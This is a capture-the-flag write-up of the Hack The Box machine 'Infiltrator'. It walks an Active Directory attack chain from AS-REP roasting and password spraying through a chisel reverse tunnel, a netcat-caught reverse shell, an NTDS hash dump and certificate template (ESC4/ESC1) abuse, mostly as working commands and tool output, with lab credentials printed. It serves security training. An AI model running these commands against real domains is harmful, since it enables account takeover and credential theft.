Infiltrator is an insane-difficulty machine from Hack The Box : Information gathering on the website -> AS-REP Roasting -> password spraying -> GenericAll on Marketing Digital -> Password change for e.rodriguez -> AddSelf tp Chiefs Marketing -> ForceChangePassword on Chiefs Marketing -> User flag -> Output Messenger forwarding to our machine -> Creds exfiltration -> .NET application reversing -> Calendar feature command injection -> creds and file exfiltration from pcap file -> Bitlocker backup key to restore file system -> NTDS info dumping -> ReadGMSAPassword on service account -> exploit ESC4 to ESC1 to administrator access
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Infiltrator.htb 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-13 09:53:07Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 |_ssl-date: 2025-06-13T09:54:43+00:00; -35s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-13T09:54:43+00:00; -35s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-13T09:54:43+00:00; -35s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-13T09:54:43+00:00; -35s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: INFILTRATOR | NetBIOS_Domain_Name: INFILTRATOR | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: infiltrator.htb | DNS_Computer_Name: dc01.infiltrator.htb | DNS_Tree_Name: infiltrator.htb | Product_Version: 10.0.17763 |_ System_Time: 2025-06-13T09:54:10+00:00 | ssl-cert: Subject: commonName=dc01.infiltrator.htb | Not valid before: 2025-06-03T14:17:24 |_Not valid after: 2025-12-03T14:17:24 |_ssl-date: 2025-06-13T09:54:43+00:00; -35s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
We can also see that we have the employees full names on the website:
Web Application
So we can use these usernames on different combinations to see if we have any valid users. We can use https://github.com/urbanadventurer/username-anarchy.git to get all combinations of usernames and indeed we have some valid usernames:
[-] User d.anderson doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User o.martinez doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User k.turner doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User a.walker doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User m.harris doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User e.rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$l[email protected]:594eea652373170981c08f7f28c67e88$eae6bd168ccd2697bf309e22bddc011fabceaff0c977c1fa9ec0b4f6f91762b4e1d3c3f30161e3b83c32abcd83727106b9d31d2e7c7f2ff3005f5d57609b23820b0b852e7376543862c0a4cca9a12302e16c903953a1e473f467a49813243a265ed077b2c0208182759c9de903c40f05a5985f77529861390a8bafbf6dbbd3e78b5d641d13d5bec912af15d8403bb99f22fcf7726df4c15dc7c0ec653b31dc79e96af6fb0195accdcf914c3fa1167352c4b67ae09fb06d6d5b51bd9b565fe6a59a5e0269ccdc9377d5161c4ce34aa7e7442388b33ed9c5eff15d733d9f6657be176f62d7a675575a6b343c4aaeb3759c6f9a
And indeed the l.clark user does have that so we can grab his password hash and crack it:
1 2 3 4 5 6 7 8 9 10
──(kali㉿kali)-[~/hackthebox/infiltrator] └─$ john --wordlist=/home/kali/Desktop/rockyou.txt hash.l.clark Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status WAT?watismypass! ($krb5asrep$23$l[email protected]) 1g 0:00:00:09 DONE (2024-09-01 14:38) 0.1085g/s 1140Kp/s 1140Kc/s 1140KC/s WAYGATE..WASHI Use the "--show" option to display all of the cracked passwords reliably Session completed
We can now use that to enumerate system using bloodhound:
┌──(kali㉿kali)-[~/] └─$ bloodhound-python -d infiltrator.htb -c all -u l.clark -p 'WAT?watismypass!' -ns 10.10.11.31 --zip INFO: Found AD domain: infiltrator.htb INFO: Getting TGT for user INFO: Connecting to LDAP server: dc01.infiltrator.htb INFO: Kerberos auth to LDAP failed, trying NTLM INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc01.infiltrator.htb INFO: Kerberos auth to LDAP failed, trying NTLM INFO: Found 14 users INFO: Found 58 groups INFO: Found 2 gpos INFO: Found 2 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc01.infiltrator.htb WARNING: Failed to get service ticket for dc01.infiltrator.htb, falling back to NTLM auth CRITICAL: CCache file is not found. Skipping... INFO: Done in 01M 13S INFO: Compressing output into 20250613101659_bloodhound.zip
We could also perform password spraying on other users to check if there has been password reuse:
And indeed it’s the same password for d.anderson user.
So the exploitation path looks like this: d.anderson has GenericAll on Marketing Digital: Bloodhound Marketing Digital contains e.rodriguez user: Bloodhound e.rodriguez user has addSelf property on Chiefs Marketing: Bloodhound Chiefs Marketing group has ForceChangePassword on m.harris: Bloodhound And finally m.harris can connect through winrm on the machine: Bloodhound
┌──(kali㉿kali)-[~] └─$ impacket-getTGT infiltrator.htb/m.harris:'WAT?watismypass!' Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in m.harris.ccache ┌──(kali㉿kali)-[~] └─$ export KRB5CCNAME=m.harris.ccache ┌──(kali㉿kali)-[~] └─$ evil-winrm -i dc01.infiltrator.htb -u "m.harris" -r INFILTRATOR.HTB Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: User is not needed for Kerberos auth. Ticket will be used Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\M.harris\Documents> cat ../desktop/user.txt e0a9dc00956a436644e776addd860f4f
Privilege Escalation
Now checking out C:/Program Files we’ll some interesting stuff such as Output Messeneger:
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 12/4/2023 9:22 AM Common Files d----- 8/21/2024 1:50 PM Hyper-V d----- 2/19/2024 3:52 AM internet explorer d----- 2/23/2024 5:06 AM Output Messenger d----- 9/6/2024 12:19 PM Output Messenger Server d----- 12/12/2023 10:04 AM PackageManagement d----- 2/19/2024 4:16 AM Update Services d----- 12/4/2023 9:23 AM VMware d-r--- 11/5/2022 12:03 PM Windows Defender d----- 8/21/2024 1:50 PM Windows Defender Advanced Threat Protection d----- 11/5/2022 12:03 PM Windows Mail d----- 8/21/2024 1:50 PM Windows Media Player d----- 9/15/2018 12:19 AM Windows Multimedia Platform d----- 9/15/2018 12:28 AM windows nt d----- 11/5/2022 12:03 PM Windows Photo Viewer d----- 9/15/2018 12:19 AM Windows Portable Devices d----- 9/15/2018 12:19 AM Windows Security d----- 12/12/2023 10:04 AM WindowsPowerShell
But I cannot access that right now.
Taking a look at open ports, we certainly find some interesting ports in relation with Output Messenger:
From the docs we can tell what are the ports for Output Messenger, each with their core functionality.
Now what I can do is forward the ports to my machine to my socks using chisel: .\Chisel.exe client 10.10.16.59:8000 R:1080:socks
Going to0 / redirects us to /ombro/index.html, an instance of Output Messenger:
Output Messenger
There is also some kind of API on port 14125. Now here I got stuck for a bit until I noticed I missed some basic enumeration enumerating users with netexec using l.clark’s creds that’ll grant me access to k.turner‘s password: MessengerApp@Pass! Which obviously will grant me access to Output Messenger. Cycling a bit through email I found some creds:
Output Messenger Which are valid creds for m.harris which we’ll use to login as him to get this interesting UserExplorer.exe application: Output Messenger
1 2
UserExplorer.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
We can see this is a .NET application so we can open it with DotPeek to check what it has for us.
We will find a couple of files named OM.db3 and OT.db3 inside C:\Users\winrm_svc\AppData\Roaming\Output Messenger> which we can download and check. Inside OM.db3 we can find some juicy data:
We can now login as winrm_svc to the Output Messenger where we’ll find an interesting email with credentials: Output Messenger Now checking the Output Messenger docs again we can see how we can interact with the API mentioned earlier.
We’ll now make this request that’ll return a chat room in html format proxychains -q curl -H "API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG" 'localhost:14125/api/chatrooms/[email protected]&fromdate=2023/01/01&todate=2024/09/01'
And we can now have some more creds: Output Messenger I can now connect with these new creds to Output Messenger where I will be exploiting a Calendar command execution by uploading my revshell onto the box and setting and action on the Calendar to execute it. And I am in:
1 2 3 4 5 6
$ rlwrap -cAr nc -lnvp 9001 Listening on 0.0.0.0 9001 Connection received on 10.10.11.31 60169
Looking deep into the pcap file I managed to find a 7z compressed file and creds for o.martinez that got validated using netexec: Output Messenger I’ll try to crack the 7z file with 7z2john and the password will be zipper. Inside the zip we can find a backup key for bitlocker which we can use later: Output Messenger We’ll now connect to rdp using o.martinez and the creds we found and recuperate bitlocker using the backup key: Output Messenger Inside of it we’ll find a Backup_credentials.7z file. Inside of it we find SAM and SECURITY hives which we can use to dump secrets:
$ secretsdump.py -security registry/SECURITY -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xd7e7d8797c1ccd58d95e4fb25cb7bdd4 [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC $MACHINE.ACC:plain_password_hex:4b90048ad6028aae98f66484009266d4efa571d48a8aa6b771d69d20aba16ddb7e0a0ffe9378a1ac7b31a812f0760fe2a8ce66ff6a0ff772155a29baa59b4407a95a920d0904cba6f8b19b6393f1551a476f991bbedaa66880e60611482a81b31b34c55c77d0e0d1792e3b18cdc9d39e0b776e7ef082399b096aaa2e8d93eb1f0340fd5f6e138da2580d1f581ff9426dce99a901a1bf88ad3f19a5bc4ce8ff17fdbb0a04bb29f13dc46177a6d8cd61bf91f8342e33b5362daecbb888df22ce467aa9f45a9dc69b03d116eeac89857d17f3f44f4abc34165b296a42b3b3ff5ab26401b5734fab6ad142d7882715927e45 $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00 [*] DefaultPassword (Unknown User):ROOT#123 [*] DPAPI_SYSTEM dpapi_machinekey:0x81f5247051ff9535ad8299f0efd531ff3a5cb688 dpapi_userkey:0x79d13d91a01f6c38437c526396febaf8c1bc6909 [*] NL$KM 0000 2E 8A EC D8 ED 12 C6 ED 26 8E B0 9B DF DA 42 B7 ........&.....B. 0010 49 DA B0 07 05 EE EA 07 05 02 04 0E AD F7 13 C2 I............... 0020 6C 6D 8E 19 1A B0 51 41 7C 7D 73 9E 99 BA CD B1 lm....QA|}s..... 0030 B7 7A 3E 0F 59 50 1C AD 8F 14 62 84 3F AC A9 92 .z>.YP....b.?... NL$KM:2e8aecd8ed12c6ed268eb09bdfda42b749dab00705eeea070502040eadf713c26c6d8e191ab051417c7d739e99bacdb1b77a3e0f59501cad8f1462843faca992 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: d27644ab3070f72ec264fcb413d75299 [*] Reading and decrypting hashes from Active Directory/ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:7bf62b9c45112ffdadb7b6b4b9299dd2::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DC$:1001:aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:454fcbc37690c6e4628ab649e8e285a5::: infiltrator.htb\winrm_svc:1104:aad3b435b51404eeaad3b435b51404ee:84287cd16341b91eb93a58456b73e30f::: infiltrator.htb\lan_managment:1105:aad3b435b51404eeaad3b435b51404ee:e8ade553d9b0cb1769f429d897c92931::: infiltrator.htb\M.harris:1106:aad3b435b51404eeaad3b435b51404ee:fc236589c448c620417b15597a3d3ca7::: infiltrator.htb\D.anderson:1107:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88::: infiltrator.htb\L.clark:1108:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88::: infiltrator.htb\O.martinez:1109:aad3b435b51404eeaad3b435b51404ee:eb86d7bcb30c8eac1bdcae5061e2dff4::: infiltrator.htb\A.walker:1110:aad3b435b51404eeaad3b435b51404ee:46389d8dfdfcf0cbe262a71f576e574b::: infiltrator.htb\K.turner:1111:aad3b435b51404eeaad3b435b51404ee:48bcd1cdc870c6285376a990c2604531::: infiltrator.htb\E.rodriguez:1112:aad3b435b51404eeaad3b435b51404ee:b1918c2ce6a62f4eee11c51b6e2e965a::: [*] Kerberos keys from Active Directory/ntds.dit DC$:aes256-cts-hmac-sha1-96:09b3e08f549e92e0b16ed45f84b25cc6d0c147ff169ce059811a3ed9e6957176 DC$:aes128-cts-hmac-sha1-96:d2a3d7c9ee6965b1e3cd710ed1ceed0f DC$:des-cbc-md5:5eea34b3317aea91 krbtgt:aes256-cts-hmac-sha1-96:f6e0a1bd3a180f83472cd2666b28de969442b7745545afb84bbeaa9397cb9b87 krbtgt:aes128-cts-hmac-sha1-96:7874dff8138091d6c344381c9c758540 krbtgt:des-cbc-md5:10bfc49ecd3b58d9 infiltrator.htb\winrm_svc:aes256-cts-hmac-sha1-96:ae473ae7da59719ebeec93c93704636abb7ee7ff69678fdec129afe2fc1592c4 infiltrator.htb\winrm_svc:aes128-cts-hmac-sha1-96:0faf5e0205d6f43ae37020f79f60606a infiltrator.htb\winrm_svc:des-cbc-md5:7aba231386c2ecf8 infiltrator.htb\lan_managment:aes256-cts-hmac-sha1-96:6fcd2f66179b6b852bb3cc30f2ba353327924081c47d09bc5a9fafc623016e96 infiltrator.htb\lan_managment:aes128-cts-hmac-sha1-96:48f45b8eb2cbd8dbf578241ee369ddd9 infiltrator.htb\lan_managment:des-cbc-md5:31c83197ab944052 infiltrator.htb\M.harris:aes256-cts-hmac-sha1-96:20433af8bf6734568f112129c951ad87f750dddf092648c80816d5cb42ed0f49 infiltrator.htb\M.harris:aes128-cts-hmac-sha1-96:2ee0cd05c3fa205a92e6837ff212b7a0 infiltrator.htb\M.harris:des-cbc-md5:3ee3688376f2e5ce infiltrator.htb\D.anderson:aes256-cts-hmac-sha1-96:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f infiltrator.htb\D.anderson:aes128-cts-hmac-sha1-96:021e189e743a78a991616821138e2e69 infiltrator.htb\D.anderson:des-cbc-md5:1529a829132a2345 infiltrator.htb\L.clark:aes256-cts-hmac-sha1-96:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc infiltrator.htb\L.clark:aes128-cts-hmac-sha1-96:5041c75e19de802e0f7614f57edc8983 infiltrator.htb\L.clark:des-cbc-md5:cd023d5d70e6aefd infiltrator.htb\O.martinez:aes256-cts-hmac-sha1-96:4d2d8951c7d6eba4edaf172fd0f7b78ab7260e3d513bf2ff387c70c85d912a2f infiltrator.htb\O.martinez:aes128-cts-hmac-sha1-96:33fdf738e13878a8101e3bf929a5a120 infiltrator.htb\O.martinez:des-cbc-md5:f80bc202755d2cfd infiltrator.htb\A.walker:aes256-cts-hmac-sha1-96:e26c97600c6f44990f18480087a685e0f1c71bcfbc8413dce6764ccf77df448a infiltrator.htb\A.walker:aes128-cts-hmac-sha1-96:768672b783131ed963b9deeac0a6d2e4 infiltrator.htb\A.walker:des-cbc-md5:a7e6cde06d6e153b infiltrator.htb\K.turner:aes256-cts-hmac-sha1-96:2c816a32b395f67df520bc734f7ea8e4df64a9610ffb3ef43e0e9df69b9df8b8 infiltrator.htb\K.turner:aes128-cts-hmac-sha1-96:b20f41c0d3b8fb6e1b793af4a835109b infiltrator.htb\K.turner:des-cbc-md5:4607b9eaec6838ba infiltrator.htb\E.rodriguez:aes256-cts-hmac-sha1-96:9114030dd2a57970530eda4ce0aa6b14f88f2be44f6d920de31eb6ee6f1587b5 infiltrator.htb\E.rodriguez:aes128-cts-hmac-sha1-96:ddd37cf706781414885f561c3b469d0c infiltrator.htb\E.rodriguez:des-cbc-md5:9d5bdaf2cd26165d [*] Cleaning up...
We can confirm that this hash is correct for l.clark only: infiltrator.htb\L.clark:627a2cb0adc7ba12ea11174941b3da88
The NTDS.Sqlite is a tool used to take all the info from the ntds.dit file and convert it to a SQLite DB for enumeration. We can do that now and get some juicy creds:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
sqlite> select commonname,description from user_accounts ; Administrator|Built-in account for administering the computer/domain Guest|Built-in account for guest access to the computer/domain krbtgt|Key Distribution Center Service Account winrm_svc|User Security and Management Specialist lan_managment|l@n_M@an!1331 M.harris|Head of Development Department
$ certipy find -vulnerable -dc-ip 10.10.11.31 -u 'infiltrator_svc$' -hashes :9ae7de37439f359608eccf2cff5d32b9 -stdout Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Trying to get CA configuration for'infiltrator-DC01-CA' via CSRA [!] Got error while trying to get CA configuration for'infiltrator-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. [*] Trying to get CA configuration for'infiltrator-DC01-CA' via RRP [!] Failed to connect to remote registry. Service should be starting now. Trying again... [*] Got CA configuration for'infiltrator-DC01-CA' [*] Enumeration output: Certificate Authorities 0 CA Name : infiltrator-DC01-CA DNS Name : dc01.infiltrator.htb Certificate Subject : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb Certificate Serial Number : 724BCC4E21EA6681495514E0FD8A5149 Certificate Validity Start : 2023-12-08 01:42:38+00:00 Certificate Validity End : 2124-08-04 18:55:57+00:00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : INFILTRATOR.HTB\Administrators Access Rights ManageCertificates : INFILTRATOR.HTB\Administrators INFILTRATOR.HTB\Domain Admins INFILTRATOR.HTB\Enterprise Admins ManageCa : INFILTRATOR.HTB\Administrators INFILTRATOR.HTB\Domain Admins INFILTRATOR.HTB\Enterprise Admins Enroll : INFILTRATOR.HTB\Authenticated Users Certificate Templates 0 Template Name : Infiltrator_Template Display Name : Infiltrator_Template Certificate Authorities : infiltrator-DC01-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : PublishToDs PendAllRequests IncludeSymmetricAlgorithms Private Key Flag : ExportableKey Extended Key Usage : Smart Card Logon Server Authentication KDC Authentication Client Authentication Requires Manager Approval : True Requires Key Archival : False Authorized Signatures Required : 1 Validity Period : 99 years Renewal Period : 650430 hours Minimum RSA Key Length : 2048 Permissions Object Control Permissions Owner : INFILTRATOR.HTB\Local System Full Control Principals : INFILTRATOR.HTB\Domain Admins INFILTRATOR.HTB\Enterprise Admins INFILTRATOR.HTB\Local System Write Owner Principals : INFILTRATOR.HTB\infiltrator_svc INFILTRATOR.HTB\Domain Admins INFILTRATOR.HTB\Enterprise Admins INFILTRATOR.HTB\Local System Write Dacl Principals : INFILTRATOR.HTB\infiltrator_svc INFILTRATOR.HTB\Domain Admins INFILTRATOR.HTB\Enterprise Admins INFILTRATOR.HTB\Local System Write Property Principals : INFILTRATOR.HTB\infiltrator_svc INFILTRATOR.HTB\Domain Admins INFILTRATOR.HTB\Enterprise Admins INFILTRATOR.HTB\Local System [!] Vulnerabilities ESC4 : 'INFILTRATOR.HTB\\infiltrator_svc' has dangerous permissions
Which is vulnerable to ESC4. ESC4 shows that infiltrator_svc$ has excessive permissions over Infiltrator_Template. This account can modify it to make it vulnerable to other ESC attacks. We’ll do that with certipy now:
1 2 3 4 5 6
$ certipy template -u 'infiltrator_svc$' -hashes :9ae7de37439f359608eccf2cff5d32b9 -dc-ip 10.10.11.31 -template Infiltrator_Template -save-old Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for'Infiltrator_Template' to 'Infiltrator_Template.json' [*] Updating certificate template 'Infiltrator_Template' [*] Successfully updated 'Infiltrator_Template'
And now re-running the check we’ll find an exploit fo ESC1 straigh to admin:
[*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 12 [*] Got certificate with UPN '[email protected]' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx'
And then simply authenticate as admin and claim our root flag:
1 2 3 4 5 6 7 8 9
$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.31 Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected] [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hashfor'administrator' [*] Got hashfor'[email protected]': aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1
